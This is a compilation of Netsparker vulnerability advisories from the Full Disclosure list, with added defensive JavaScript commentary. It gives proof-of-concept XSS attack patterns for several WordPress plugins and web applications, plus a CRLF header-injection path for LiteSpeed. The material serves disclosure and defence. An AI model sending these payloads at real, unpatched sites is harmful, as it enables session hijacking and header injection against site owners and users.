[FD] BulletProof Security 53.3 - Security Advisory - Multiple XSS Vulnerabilities

2016-05-10 Thread Onur Yilmaz
Information

Advisory by Netsparker
Name: Multiple XSS Vulnerabilities in BulletProof Security
Affected Software : BulletProof Security
Affected Versions: v53.3 and possibly below
Vendor Homepage : https://wordpress.org/plugins/bulletproof-security/
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Fixed
Netsparker Advisory Reference : NS-16-004

Technical Details

Proof of Concept URLs for XSS vulnerabilities in BulletProof Security v53.3:

URL 
/wordpress/wp-admin/admin.php?page=bulletproof-security/admin/security-log/security-log.php
Parameter Name user-agent-ignore
Parameter Type POST
Attack Pattern '"-->alert(0x001E32)

For more information on cross-site scripting vulnerabilities read the
article Cross-site Scripting (XSS).

Advisory Timeline

15 Mar 2016 - First Contact
23 Mar 2016 - Vendor Fixed
09 May 2016 - Advisory Released

Solution

Update the plugin.

Credits & Authors

These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner.

About Netsparker

Netsparker web application security scanners find and report security
flaws and vulnerabilities such as SQL Injection and Cross-site
Scripting (XSS) in all websites and web applications, regardless of
the platform and technology they are built on. Netsparker scanning
engine’s unique detection and exploitation techniques allow it to be
dead accurate in reporting vulnerabilities. The Netsparker web
application security scanner is available in two editions; Netsparker
Desktop and Netsparker Cloud. Visit our website
https://www.netsparker.com for more information.

Onur Yılmaz - National General Manager

Netsparker Web Application Security Scanner
T: +90 (0)554 873 0482

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] LiteSpeed Web Server - Security Advisory - HTTP Header Injection Vulnerability

2016-01-20 Thread Onur Yilmaz
Information

Advisory by Netsparker
Name: HTTP Header Injection in LiteSpeed Web Server
Affected Software : LiteSpeed Web Server
Affected Versions: v5.1.0 and possibly below
Vendor Homepage : https://www.litespeedtech.com/
Vulnerability Type : HTTP Header Injection
Severity : Medium
Status : Fixed
CVE-ID : TBA
Netsparker Advisory Reference : NS-16-001

Description

While testing Netsparker, we spotted an HTTP Header Injection
vulnerability in LiteSpeed.

LiteSpeed Web Server v5.1.0 and possibly below are affected if
mod_userdir is enabled. This vulnerability can be exploited in various
ways depending on the application.

Technical Details

Proof of Concept URL for HTTP Header Injection in LiteSpeed Web Server:

/~%0d%0aSet-Cookie:Scanner=Netsparker%0d%0a
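The PoC above works by percent-encoding a CR/LF pair (%0d%0a) into the user name part of a mod_userdir path so that, when the server copies that value into a response header, the injected bytes terminate the header line and a second, attacker-chosen header follows. The JavaScript below is an added example, not LiteSpeed's code or anything from the advisory: it shows the output-side guard that closes this class of bug (refuse any CR, LF or NUL in a header name or value) beside the unguarded concatenation, and a small access-log check that flags request paths carrying encoded or literal CR/LF. The redirect-header model, the `userdirName`/`formatHeader` helpers and the log lines are assumptions and constructed samples; only the PoC path is from the advisory, and the advisory does not state which header LiteSpeed reflected the value into.

```javascript
// Added example, not LiteSpeed's code: an output-side guard for response
// headers and a log check for encoded CR/LF in request paths. The decoded PoC
// path from the advisory is the test input; everything else is constructed.

// CR, LF and NUL are the characters that let a value end one header line and
// begin another, so a value containing any of them must never be emitted.
function isSafeHeaderToken(s) {
  return typeof s === "string" && !/[\r\n\0]/.test(s);
}

// Build one "Name: value" line, refusing (rather than stripping) bad input so
// the defect surfaces as an error instead of a silently mangled header.
function formatHeader(name, value) {
  if (!isSafeHeaderToken(name) || !isSafeHeaderToken(value)) {
    throw new Error("refusing to emit a header containing CR/LF: " + name);
  }
  return name + ": " + value;
}

// Extract the user name a mod_userdir-style handler would take from "/~user".
function userdirName(requestPath) {
  return decodeURIComponent(requestPath.replace(/^\/~/, "").split("/")[0]);
}

// The unsafe pattern behind the finding: request data concatenated into a raw
// header line. A Location redirect is assumed here for illustration; the
// advisory does not say which header the server used.
function redirectHeaderUnsafe(requestPath) {
  return "Location: /home/" + userdirName(requestPath) + "/\r\n";
}
function redirectHeaderSafe(requestPath) {
  return formatHeader("Location", "/home/" + userdirName(requestPath) + "/") + "\r\n";
}

// How many header lines a client would parse out of a raw header string; a
// correctly built single header yields exactly one.
function headerLineCount(raw) {
  return raw.split("\r\n").filter((line) => line.length > 0).length;
}

// Detection side: flag request paths in access-log lines that carry CR/LF,
// percent-encoded (%0d / %0a, any case) or literal after decoding.
function findCrlfRequests(logLines) {
  const hits = [];
  for (const line of logLines) {
    const m = line.match(/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/);
    if (!m) continue;
    const path = m[1];
    let decoded = path;
    try { decoded = decodeURIComponent(path); } catch (e) { /* keep raw */ }
    if (/%0[dDaA]/.test(path) || /[\r\n]/.test(decoded)) hits.push(path);
  }
  return hits;
}

// Constructed access-log lines (Common Log Format); the second carries the
// advisory's PoC path.
const POC_PATH = "/~%0d%0aSet-Cookie:Scanner=Netsparker%0d%0a";
const SAMPLE_LOG = [
  '203.0.113.5 - - [20/Jan/2016:10:00:01 +0000] "GET /~alice/ HTTP/1.1" 200 512',
  '203.0.113.5 - - [20/Jan/2016:10:00:02 +0000] "GET ' + POC_PATH + ' HTTP/1.1" 302 0',
  '198.51.100.7 - - [20/Jan/2016:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024',
];

if (typeof require !== "undefined" && require.main === module) {
  console.log("header lines from unsafe builder:", headerLineCount(redirectHeaderUnsafe(POC_PATH)));
  console.log("flagged requests:", findCrlfRequests(SAMPLE_LOG));
}
```

With the PoC path, `redirectHeaderUnsafe` produces three header lines where one was intended, which is the injection; `redirectHeaderSafe` throws instead. Rejecting rather than stripping is deliberate: a stripped value hides the fact that untrusted data reached a header sink, while an error is something a test or a log alert will catch. The log check is a coarse first pass (it only looks at the request line), but it finds exactly the probe shape used in this advisory.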

Advisory Timeline

15 Jan 2016 - First Contact
18 Jan 2016 - Vendor Fixed
20 Jan 2016 - Advisory Released

Solution

Patch released by LiteSpeed and announced here:
https://www.litespeedtech.com/products/litespeed-web-server/release-log.
Download the latest version.

Credits & Authors

This issue has been discovered by Ziyahan Albeniz while testing
Netsparker Web Application Security Scanner
(https://www.netsparker.com).

About Netsparker

Netsparker web application security scanners find and report security
flaws and vulnerabilities such as SQL Injection and Cross-site
Scripting (XSS) in all websites and web applications, regardless of
the platform and technology they are built on. Netsparker scanning
engine’s unique detection and exploitation techniques allow it to be
dead accurate in reporting vulnerabilities, hence it does not report
any false positives. The Netsparker web application security scanner
is available in two editions; Netsparker Desktop and Netsparker Cloud.
Visit our website https://www.netsparker.com for more information.

Onur Yılmaz - National General Manager

Netsparker Web Application Security Scanner
T: +90 (0)554 873 0482


[FD] OpenCart Security Advisory - XSS Vulnerability - CVE-2015-4671

2016-01-08 Thread Onur Yilmaz
Information

Advisory by Netsparker
Name: XSS Vulnerability in OpenCart
Affected Software : OpenCart
Affected Versions: v2.1.0.1 and possibly below
Vendor Homepage : http://www.opencart.com
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Fixed
CVE-ID : CVE-2015-4671
Netsparker Advisory Reference : NS-15-023

Description

By exploiting a Cross-site scripting vulnerability the attacker can hijack
a logged in user’s session. This means that the malicious hacker can change
the logged in user’s password and invalidate the session of the victim
while the hacker maintains access. As seen from the XSS example in this
article, if a web application is vulnerable to cross-site scripting and the
administrator’s session is hijacked, the malicious hacker exploiting the
vulnerability will have full admin privileges on that web application.

Technical Details

Proof of Concept URLs for XSS in OpenCart v2.1.0.1:

/opencart/index.php?route=account/address/add
(zone_id - POST)

For more information on cross-site scripting vulnerabilities read the
following article on Cross-site Scripting (XSS) -
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/

Advisory Timeline

07/12/2015 - First Contact
16/12/2015 - Vendor Fixed
18/12/2015 - Advisory Released

Solution

https://github.com/opencart/opencart/commit/303fa88fe664ded4bf8753b997abd916f0a3c03f


Credits & Authors

These issues have been discovered by Ziyahan Albeniz while testing
Netsparker Web Application Security Scanner -
https://www.netsparker.com/web-vulnerability-scanner/

About Netsparker

Netsparker web application security scanners find and report security flaws
and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in
all websites and web applications, regardless of the platform and
technology they are built on. Netsparker scanning engine’s unique detection
and exploitation techniques allow it to be dead accurate in reporting
vulnerabilities. The Netsparker web application security scanner is
available in two editions; Netsparker Desktop and Netsparker Cloud. Visit
our website https://www.netsparker.com for more information.

Onur Yılmaz - National General Manager

Netsparker Web Application Security Scanner 
T: +90 (0)554 873 0482


[FD] TestLink Security Advisory - Multiple XSS Vulnerabilities - CVE-2015-7391

2015-10-08 Thread Onur Yilmaz
Information

Advisory by Netsparker.
Name: Multiple XSS Vulnerabilities in TestLink 1.9.13
Affected Software : TestLink
Affected Versions: 1.9.1.3 and possibly below
Vendor Homepage : http://testlink.org/
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Fixed
CVE-ID : CVE-2015-7391
Netsparker Advisory Reference : NS-15-016

Description

By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator’s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.

Technical Details

Proof of Concept URLs for XSS in TestLink 1.9.13:

/testlink-code-1.9.13/lib/results/tcCreatedPerUserOnTestProject.php
Parameter Name  selected_end_date
Parameter Type  POST
Attack Pattern  '"-->alert(0x008360)

/testlink-code-1.9.13/lib/results/tcCreatedPerUserOnTestProject.php
Parameter Name  selected_start_date
Parameter Type  POST
Attack Pattern  '"-->alert(0x007F5A)

/testlink-code-1.9.13/lib/testcases/containerEdit.php
Parameter Name  containerType
Parameter Type  POST
Attack Pattern  '"-->alert(0x0053E8)

/testlink-code-1.9.13/lib/testcases/listTestCases.php?feature=edit_tc
Parameter Name  filter_tc_id
Parameter Type  POST
Attack Pattern  ">

/testlink-code-1.9.13/lib/testcases/listTestCases.php?feature=edit_tc
Parameter Name  filter_testcase_name
Parameter Type  POST
Attack Pattern  '"-->alert(0x0050D4)

/testlink-code-1.9.13/lib/testcases/tcImport.php?containerID=2=1='"-->alert(0x004898)
Parameter Name  useRecursion
Parameter Type  GET
Attack Pattern  '"-->alert(0x004898)

/testlink-code-1.9.13/lib/testcases/tcSearch.php
Parameter Name  targetTestCase
Parameter Type  POST
Attack Pattern  ">

/testlink-code-1.9.13/lib/testcases/tcSearch.php
Parameter Name  created_by
Parameter Type  POST
Attack Pattern  ">alert(9)

/testlink-code-1.9.13/third_party/user_contribution/fakeRemoteExecServer/client4fakeXMLRPCTestRunner.php
Parameter Name  Referer
Parameter Type  HTTP Header
Attack Pattern  '"-->alert(0x00FF1E)

For more information on cross-site scripting vulnerabilities read the
following article:
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/cross-site-scripting-xss/

Advisory Timeline

15/09/2015 - First Contact
02/10/2015 - Vendor Fixed
05/10/2015 - Advisory Released

Solution

https://github.com/TestLinkOpenSourceTRMS/testlink-code/releases/tag/1.9.14

Credits & Authors

These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner
(https://www.netsparker.com).

About Netsparker

Netsparker web application security scanners find and report security
flaws and vulnerabilities such as SQL Injection and Cross-site
Scripting (XSS) in all websites and web applications, regardless of
the platform and technology they are built on. Netsparker scanning
engine’s unique detection and exploitation techniques allow it to be
dead accurate in reporting vulnerabilities, hence it does not report
any false positives. The Netsparker web application security scanner
is available in two editions; Netsparker Desktop and Netsparker Cloud.
Visit our website https://www.netsparker.com for more information.

-- 
Onur Yılmaz - National General Manager

Netsparker Web Application Security Scanner
T: +90 (0)554 873 0482


[FD] DataTables Security Advisory - XSS Vulnerability - CVE-2015-6584

2015-09-10 Thread Onur Yilmaz
Information

Advisory by Netsparker.
Name: XSS Vulnerability in DataTables
Affected Software : DataTables
Affected Versions : 1.10.8 and possibly below
Vendor Homepage : https://github.com/DataTables/DataTables
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Fixed
CVE-ID : CVE-2015-6584
Netsparker Advisory Reference : NS-15-014

Description

By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator’s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.

Technical Details

Proof of Concept URL for XSS in DataTables:

Page: 6776.php
Parameter Name: scripts
Parameter Type: GET
Attack Pattern:
http://example.com/DataTables-master/media/unit_testing/templates/6776.php?scripts='"-->alert(0x00807E)

For more information on cross-site scripting (XSS) vulnerabilities
read the following article:
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/cross-site-scripting-xss/

Advisory Timeline

04/09/2015 - First Contact
08/09/2015 - Vendor Fixed
09/09/2015 - Advisory Released

Credits & Authors

These issues have been discovered by Onur Yilmaz while testing
Netsparker Web Application Security Scanner
(https://www.netsparker.com).

About Netsparker

Netsparker finds and reports security flaws and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allow it to be dead accurate in reporting vulnerabilities,
hence it is the first and only False Positive Free web application
security scanner.

-- 
Onur Yılmaz - National General Manager

Netsparker Web Application Security Scanner
T: +90 (0)554 873 0482


[FD] Concrete5 Security Advisory - Multiple XSS Vulnerabilities - CVE-2015-2250

2015-05-13 Thread Onur Yilmaz
Information

Advisory by Netsparker.
Name: Multiple XSS Vulnerabilities in Concrete5
Affected Software : Concrete5
Affected Versions: 5.7.3.1 and possibly below
Vendor Homepage : https://www.concrete5.org
Vulnerability Type : Cross-site Scripting
Severity : Important
CVE-ID: CVE-2015-2250
Netsparker Advisory Reference : NS-15-008

Description

By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator’s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.

Technical Details

Proof of Concept URLs for cross-site scripting vulnerabilities in Concrete5:

URL: 
/concrete5.7.3.1/index.php/dashboard/system/conversations/bannedwords/success
Parameter Name: banned_word%5b%5d
Parameter Type: POST
Attack Pattern: '--/style/scRiptscRiptalert(0x000936)/scRipt

URL: 
/concrete5.7.3.1/index.php/dashboard/reports/logs/view?keywords=level=channel='--/style/scRiptscRiptalert(0x0044C4)/scRiptlevel[]=600
Parameter Name: channel
Parameter Type: GET
Attack Pattern: '--/style/scRiptscRiptalert(0x0044C4)/scRipt

URL: 
/concrete5.7.3.1/index.php/tools/required/permissions/access_entity?peID=1pdID=3accessType='--/style/scRiptscRiptalert(0x00690C)/scRipt
Parameter Name: accessType
Parameter Type: GET
Attack Pattern: '--/style/scRiptscRiptalert(0x00690C)/scRipt

URL: /concrete5.7.3.1/index.php/dashboard/system/multilingual/setup/load_icon
Parameter Name: msCountry
Parameter Type: POST
Attack Pattern: '--/style/scRiptscRiptalert(0x00D064)/scRipt

URL: 
/concrete5.7.3.1/index.php/tools/required/permissions/access_entity?accessType='--/style/scRiptscRiptalert(0x00687C)/scRiptpkCategoryHandle=block_type
Parameter Name: accessType
Parameter Type: GET
Attack Pattern: '--/style/scRiptscRiptalert(0x00687C)/scRipt

URL: 
/concrete5.7.3.1/index.php/ccm/system/dialogs/area/design/submit?ccm_token=1423928022:7f9b7c3cb0f6721bab4a0dec86cefaa3cID=1arHandle='--/style/scRiptscRiptalert(0x00D33A)/scRipt
Parameter Name: arHandle
Parameter Type: GET
Attack Pattern: '--/style/scRiptscRiptalert(0x00D33A)/scRipt

URL: /concrete5.7.3.1/index.php/dashboard/pages/single
Parameter Name: pageURL:
Parameter Type: POST
Attack Pattern: '--/style/scRiptscRiptalert(0x00627A)/scRipt

URL: 
/concrete5.7.3.1/index.php/ccm/system/dialogs/area/design?arHandle='--/style/scRiptscRiptalert(0x001D34)/scRiptcID=1
Parameter Name: arHandle
Parameter Type: GET
Attack Pattern: '--/style/scRiptscRiptalert(0x001D34)/scRipt

URL: /concrete5.7.3.1/index.php/dashboard/system/seo/searchindex/updated
Parameter Name: SEARCH_INDEX_AREA_METHOD
Parameter Type: POST
Attack Pattern: ' onmouseover= alert(0x00047E)

URL: /concrete5.7.3.1/index.php/dashboard/system/optimization/jobs/job_scheduled
Parameter Name: unit
Parameter Type: POST
Attack Pattern: ' onmouseover= alert(0x000C5A)

URL: /concrete5.7.3.1/index.php/dashboard/system/registration/open/1
Parameter Name: register_notification_email
Parameter Type: POST
Attack Pattern: ' onmouseover= alert(0xDE)

URL: 
/concrete5.7.3.1/index.php/dashboard/extend/connect/onmouseover=alert(0x00170E)
Parameter Name: URI-BASED
Parameter Type: Full URL:
Attack Pattern: /onmouseover=alert(0x00170E)

For more information on cross-site scripting vulnerabilities read the
following article:
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/

Advisory Timeline

05/03/2015 - First Contact
06/05/2015 - Vulnerability fixed
11/05/2015 - Advisory released

Solution

Download Concrete5 version 5.7.4 which includes fix for this vulnerability.

Credits & Authors

These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner -
https://www.netsparker.com/web-vulnerability-scanner/

About Netsparker

Netsparker finds and reports security issues and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allows it to be dead accurate in reporting hence it's the
first and the only False Positive Free web application security
scanner. For more information visit our website on
https://www.netsparker.com

-- 
Onur Yılmaz - Turkey Manager

Netsparker Web Application Security Scanner
T: +90 (0)554 873 0482


[FD] Wordpress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429

2015-05-09 Thread Onur Yilmaz
Information

Advisory by Netsparker.
Name: DOM XSS Vulnerability in Twenty Fifteen WordPress Theme
Affected Software : WordPress
Affected Versions: 4.2.1 and probably below
Vendor Homepage : https://wordpress.org/ and
https://wordpress.org/themes/twentyfifteen/
Vulnerability Type : DOM based Cross-site Scripting
Severity : Important
CVE-ID: CVE-2015-3429
Netsparker Advisory Reference : NS-15-007

Description

By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator’s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.

Technical Details

Proof of Concept URL for DOM XSS in WordPress:

http://example.com/wordpress/wp-content/themes/twentyfifteen/genericons/example.html#img/src/onerror=alert(123)

For more information on DOM based cross-site scripting vulnerabilities
read the following article:
https://www.netsparker.com/blog/web-security/dom-based-cross-site-scripting-vulnerability/

Advisory Timeline

22/04/2015 - First Contact
07/05/2015 - Vulnerability fixed
07/05/2014 - Advisory released

Solution

Download WordPress version 4.2.2 which includes fix for this vulnerability.

Credits & Authors

These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner -
https://www.netsparker.com/web-vulnerability-scanner/

About Netsparker

Netsparker finds and reports security issues and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allows it to be dead accurate in reporting hence it's the
first and the only False Positive Free web application security
scanner. For more information visit our website on
https://www.netsparker.com


[FD] Banner Effect Header Security Advisory - XSS Vulnerability - CVE-2015-1384

2015-01-31 Thread Onur Yilmaz
Information

Advisory by Netsparker.
Name: XSS Vulnerability in Banner Effect Header
Affected Software : Banner Effect Header
Affected Versions: 1.2.7 and possibly below
Vendor Homepage : https://wordpress.org/plugins/banner-effect-header/
Vulnerability Type : Cross-site Scripting
Severity : Important
CVE-ID: CVE-2015-1384
Netsparker Advisory Reference : NS-15-002

Description
---
By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator’s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.

Technical Details
-
Proof of Concept URLs for XSS in Banner Effect Header:

URL: /wp-admin/options-general.php?page=BannerEffectOptions
Parameter Name: banner_effect_divid
Parameter Type: Post
Attack Pattern:  onclick=alert(1) 
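The attack patterns across these advisories fall into three output contexts: the `'"-->` break-outs in the BulletProof Security, TestLink and DataTables findings, where the reflected value closes the tag or comment it lands in; the `' onmouseover=` and `onclick=` patterns in Concrete5 and here, which need no angle brackets because a space inside an unquoted attribute starts a new attribute; and the location.hash sink in the Twenty Fifteen genericons page, where the browser, not the server, assembles the markup. The JavaScript below is an added example and is not code from Netsparker or from any of the affected projects. It models each context as a string-building function in a vulnerable and a hardened form, and adds two small parser-like checks so the difference can be asserted without a browser. The `renderMessage*`, `renderInput*` and `iconFromHash*` functions, the assumed behaviour of the genericons page (the advisory does not describe its script) and all payload strings are assumptions or constructed inputs.

```javascript
// Added example, not code from any project named in these advisories. It shows
// the three output contexts behind the XSS patterns on this page and the
// handling that closes each; payload strings are constructed for the checks.

// HTML text context: encode the characters that can change how markup parses.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;").replace(/'/g, "&#x27;");
}

// Text context. The '"--> style findings work because the reflected value
// closes whatever tag or comment it lands in; escaping removes that ability.
function renderMessageUnsafe(msg) { return "<p>" + msg + "</p>"; }
function renderMessageSafe(msg) { return "<p>" + escapeHtml(msg) + "</p>"; }

// Attribute context. The ' onmouseover= and onclick= findings need no angle
// brackets: in an unquoted attribute a space starts a new attribute, so
// escaping without quoting still leaves the hole. Quote AND escape.
function renderInputUnsafe(v) { return "<input value=" + v + ">"; }
function renderInputEscapedOnly(v) { return "<input value=" + escapeHtml(v) + ">"; }
function renderInputSafe(v) { return '<input value="' + escapeHtml(v) + '">'; }

// DOM-based context. Assumed model of the genericons page: a name is read from
// location.hash and markup is built from it. Returned as a string so it runs
// without a browser. The hardened form allow-lists the name instead of
// encoding it, because the value is used as an identifier, not as text.
function iconFromHashUnsafe(hash) {
  const name = decodeURIComponent(hash.replace(/^#/, ""));
  return '<span class="genericon genericon-' + name + '"></span>';
}
const ICON_NAME = /^[a-z0-9-]{1,32}$/; // allow-list, not an encoder
function iconFromHashSafe(hash) {
  const name = decodeURIComponent(hash.replace(/^#/, ""));
  return ICON_NAME.test(name)
    ? '<span class="genericon genericon-' + name + '"></span>'
    : null; // refuse to render an unexpected name
}

// Checks used to compare the two forms without a browser.
// Number of tag openings (start or end tags) in a markup string.
function countTags(html) {
  return (html.match(/<\/?[a-zA-Z]/g) || []).length;
}
// Attribute names a parser would assign to one start tag, honouring quotes
// the way a browser does: a quoted value may contain spaces and '=' freely.
function attributeNames(tag) {
  const inner = tag.replace(/^<\w+\s*/, "").replace(/\/?>$/, "");
  const names = [];
  let i = 0;
  while (i < inner.length) {
    if (/\s/.test(inner[i])) { i++; continue; }
    let name = "";
    while (i < inner.length && !/[\s=]/.test(inner[i])) name += inner[i++];
    names.push(name.toLowerCase());
    while (i < inner.length && /\s/.test(inner[i])) i++;
    if (inner[i] !== "=") continue;
    i++;
    while (i < inner.length && /\s/.test(inner[i])) i++;
    const q = inner[i];
    if (q === '"' || q === "'") {
      i++;
      while (i < inner.length && inner[i] !== q) i++;
      i++; // step over the closing quote
    } else {
      while (i < inner.length && !/\s/.test(inner[i])) i++;
    }
  }
  return names;
}
```

The `renderInputEscapedOnly` case is the one worth remembering from this page: with a payload of the `' onmouseover=` shape the escaped-but-unquoted attribute parses to two attributes exactly as the unescaped one does, so an encoder applied without quoting does not fix the Concrete5 or Banner Effect style findings. For the hash-driven case the right control is validation against what the page expects (an icon name), since an HTML encoder would merely produce a broken class name rather than reject the input.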

For more information on cross-site scripting vulnerabilities read the
following article on Cross-site Scripting (XSS) -
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/

Advisory Timeline

21/01/2015 - First Contact
29/01/2015 - Vulnerability fixed
29/01/2015 - Advisory released

Solution

Download version 1.2.8 which includes fix for this vulnerability.

Credits & Authors
-
These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner  -
https://www.netsparker.com/web-vulnerability-scanner/

About Netsparker

Netsparker finds and reports security flaws and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allow it to be dead accurate in reporting vulnerabilities,
hence it is the first and only False Positive Free web application
security scanner. For more information visit our website on
https://www.netsparker.com


[FD] Blubrry PowerPress Security Advisory - XSS Vulnerability - CVE-2015-1385

2015-01-29 Thread Onur Yilmaz
Information

Advisory by Netsparker
Name: XSS Vulnerability in Blubrry PowerPress
Affected Software : Blubrry PowerPress
Affected Versions: 6.0 and possibly below
Vendor Homepage : https://wordpress.org/plugins/powerpress/
Vulnerability Type : Cross-site Scripting
Severity : Important
CVE-ID: CVE-2015-1385
Netsparker Advisory Reference : NS-15-001

Description
---
By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator’s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.

Netsparker finds and reports security issues and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allows it to be dead accurate in reporting hence it's the
first and the only False Positive Free web application security
scanner.


Proof of Concept URLs for XSS in Blubrry PowerPress WordPress plugin:

/wp-admin/admin.php?page=powerpress/powerpressadmin_categoryfeeds.phpaction=powerpress-editcategoryfeedcat=1';--/style/scRiptscRiptalert(0x014068)/scRipt

For more information on cross-site scripting vulnerabilities read the
following article on Cross-site Scripting (XSS) -
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/

Advisory Timeline

22/01/2015 - First Contact
26/01/2015 - Vulnerability fixed
29/01/2015 - Advisory released

Solution

Download version 6.0.1 which includes fix for this vulnerability.

Credits & Authors

These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner -
https://www.netsparker.com/web-vulnerability-scanner/

About Netsparker

Netsparker finds and reports security issues and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allows it to be dead accurate in reporting hence it's the
first and the only False Positive Free web application security
scanner. For more information visit our website on
https://www.netsparker.com
